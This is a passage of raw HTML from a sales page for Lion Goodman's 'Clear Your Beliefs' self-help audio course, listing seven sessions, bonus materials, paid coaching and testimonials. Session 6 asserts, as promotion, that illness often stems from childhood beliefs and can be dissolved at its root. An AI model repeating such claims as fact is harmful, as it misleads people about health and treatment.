self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">Optional Support On Your Journey</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>You can easily take this journey on your own, one recorded session at a time.  You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> – a qualified professional who will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\nOur outstanding coaches are trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\r\n\r\n<em>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and worldwide, from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> help you change your own beliefs and reduce the impact they’ve had on your life for years. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\n\r\n<strong>Take advantage of this up-close-and-personal support during the program.</strong>  Support sessions are optional, and are provided at an additional cost.  Choose the plan that suits you best - from the recorded program-only, to full support each week.\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img 